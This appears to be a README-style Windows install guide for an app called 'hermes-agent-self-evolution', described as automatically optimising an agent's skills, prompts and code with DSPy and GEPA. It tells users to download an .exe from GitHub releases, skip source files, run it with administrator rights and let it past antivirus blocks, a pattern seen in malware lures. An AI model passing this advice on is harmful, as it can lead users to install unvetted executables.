This app helps you improve the Hermes Agent software by itself. It works to optimize skills, prompts, and code automatically using technologies called DSPy and GEPA. You don’t need to know about programming to use it. Just follow the steps here to get it running on your Windows computer.
Before you start, make sure your Windows PC meets these basic requirements:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of free disk space
- Minimum 8 GB of RAM (16 GB or more recommended for better performance)
- Internet connection to download the app and allow updates
- Administrative rights to install software
To use hermes-agent-self-evolution, you first need to download it from the official GitHub page.
Click the button below to open the GitHub page where you can get the app:
This page is the source for all versions of the app. Here you can find instructions, updates, and sometimes extra help documents.
On the GitHub page, look for a section called "Releases" on the right side or in the repository menu. Click there. You will see different versions of the software. Find the latest one by checking the date or version number.
Look for a Windows installer file. It will usually end with ".exe". Click the file to start downloading. The download size is around 100-200 MB depending on the version.
If you see only source code files, do not download those. You need the Windows executable.
Once downloaded, open the file to start installation. You might see a message asking if you want to allow the app to make changes—choose "Yes" or "Run".
Follow the simple instructions on screen:
- Choose installation folder (default is fine for most users)
- Click "Next" or "Install"
- Wait a few minutes for the process to finish
No special options are needed here. The installer sets up everything automatically.
After installation, you will find the app icon on your desktop or start menu labeled "hermes-agent-self-evolution."
Double-click the icon to open. You will see a straightforward interface to start the self-improvement tasks.
The app lets you improve three key areas:
- Skills: Enhance Hermes Agent’s abilities and functions.
- Prompts: Optimize commands and instructions the agent uses.
- Code: Refine the software’s underlying code for better reliability.
Use the simple menu to select what you want to improve first.
Click the start button once you select your focus. The app will run in the background, analyze, and make improvements automatically.
You can monitor progress on the screen, which shows status updates and logs. You don’t need to do anything else during this step.
When the app finishes, it will prompt you to save improvements. Click "Save" to update your Hermes Agent.
Close the app or run another improvement cycle as needed.
- If the app won’t open, check if your antivirus program blocked it. Allow it through the antivirus firewall if needed.
- Run the app with administrator rights if you see permission errors.
- Restart your computer after installation to ensure updates apply.
- Keep the app updated by revisiting the GitHub releases page regularly.
- If the app freezes, close it using Task Manager and restart.
